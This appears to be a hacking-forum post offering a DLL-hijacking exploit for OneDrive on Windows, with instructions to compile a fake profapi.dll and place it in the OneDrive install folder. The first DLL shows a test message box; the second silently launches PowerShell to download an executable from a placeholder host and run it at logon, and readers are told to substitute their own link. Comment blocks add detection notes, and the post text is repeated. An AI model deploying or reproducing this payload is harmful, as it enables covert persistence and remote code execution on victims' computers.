INTRO : There is a DLL-hijacking vulnerability in the latest versions of OneDrive. It allows actions to be performed when the computer starts, because this program is launched automatically on Windows 10 and 11 and is also preinstalled.
HOW TO EXPLOIT :
1) Use this code to test the vulnerability
COMPILE WITH : gcc thisfile.cpp -o profapi.dll -shared
Put this dll on : C:\Program Files\Microsoft OneDrive
Restart OneDrive and you will get:
2) Custom DLL
After many tries, I cooked this code to download a file and run it :
Replace linktoyourexe/exe.exe by your link !
SUGGESTIONS :
If you have any suggestions or improvements to make, I'll be happy to take them into consideration!
If you need help, you can answer here!
Thank you!
HOW TO EXPLOIT :
1) Use this code to test the vulnerability
C++:
#include <windows.h>
/*
 * Test-only DLL entry point for the hijack described above.  When the host
 * process maps this library, the DLL_PROCESS_ATTACH case shows a message
 * box; thread attach/detach and process detach are no-ops.  Returning TRUE
 * lets the load complete.
 *
 * Defender notes:
 *  - Code in DllMain runs inside the host process, so it inherits
 *    OneDrive.exe's identity and its automatic start-up timing.
 *  - The observable is a module-load event for a DLL that shares a system
 *    DLL's name (profapi.dll, per the post) but is loaded from the
 *    application directory instead of System32 and is not Microsoft-signed
 *    (e.g. Sysmon image-load events).  Comparing the signer/path of loaded
 *    modules named like system DLLs is the hunt.
 *  - The install directory named in the post sits under Program Files,
 *    which by default is writable only by administrators; the hijack
 *    therefore presupposes an already-privileged foothold or a weakened
 *    directory ACL — confirm the ACL on the affected host.  Application-
 *    side mitigations are fully-qualified load paths / safe DLL-search
 *    settings and verifying module signatures before loading.
 */
BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
/* Executes under the loader lock; calling into user32 (MessageBoxA) from
 * DllMain is discouraged by Microsoft's DllMain guidance and can deadlock
 * the host, so this is only usable as a visual "did it load" check. */
MessageBoxA(NULL, "Attached", "Attached", MB_OK);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
COMPILE WITH : gcc thisfile.cpp -o profapi.dll -shared
Put this dll on : C:\Program Files\Microsoft OneDrive
Restart OneDrive and you will get:
2) Custom DLL
After many tries, I cooked this code to download a file and run it :
C++:
#include <windows.h>
/*
 * Second-stage payload.  Builds a fixed powershell.exe command line that
 * downloads a remote executable with Invoke-WebRequest into
 * %LOCALAPPDATA%\Chrome\exe.exe and starts it minimized, then launches that
 * command line with CreateProcessW and CREATE_NO_WINDOW (no console shown).
 * Returns 0 if CreateProcessW succeeded, 1 if it failed; the process and
 * thread handles in `pi` are never closed, so they leak in the host process.
 *
 * Defender notes:
 *  - The DLL itself never touches the network; PowerShell does.  The
 *    detectable artefact is the process tree OneDrive.exe -> powershell.exe
 *    whose command line contains "-Command Invoke-WebRequest ... Start-Process",
 *    followed by a new executable started from %LOCALAPPDATA%\Chrome.
 *  - Process-creation auditing with command lines (Sysmon process-create or
 *    4688 with command-line logging), PowerShell Script Block Logging, and a
 *    parent/child rule on OneDrive.exe spawning powershell.exe each cover
 *    this stage; an application-control policy that blocks unsigned
 *    executables under %LOCALAPPDATA% blocks the final step.
 */
OnedriveMain() {
wchar_t command[] = L"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe";
wchar_t args[] = L"-Command Invoke-WebRequest -Uri 'http://linktoyourexe.com/exe.exe' -OutFile \"$env:LOCALAPPDATA\\Chrome\\exe.exe\"; Start-Process \"$env:LOCALAPPDATA\\Chrome\\exe.exe\" -WindowStyle Minimized";
STARTUPINFOW si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
/* args is passed as the mutable lpCommandLine buffer CreateProcessW requires;
 * CREATE_NO_WINDOW keeps the PowerShell console hidden. */
if (!CreateProcessW(command, args, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
return 1;
}
return 0;
}
/*
 * DLL entry point for the custom payload.  On DLL_PROCESS_ATTACH it calls
 * OnedriveMain() synchronously (no other reason codes are handled) and
 * always returns TRUE, so the host process keeps loading whether or not
 * the payload's CreateProcessW succeeded — the return value of
 * OnedriveMain() is discarded.
 *
 * Defender notes: because the call happens inside DllMain, the child
 * process is created while the loader lock is held (a pattern Microsoft's
 * DllMain guidance warns against).  From a telemetry standpoint the
 * powershell.exe launch is timestamped at the very start of the host
 * process, i.e. at user logon when OneDrive auto-starts; a rule matching
 * OneDrive.exe as the parent of powershell.exe within seconds of process
 * start covers this entry path.
 */
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
OnedriveMain();
break;
}
return TRUE;
}
Replace linktoyourexe/exe.exe by your link !
SUGGESTIONS :
If you have any suggestions or improvements to make, I'll be happy to take them into consideration!
If you need help, you can answer here!
Thank you!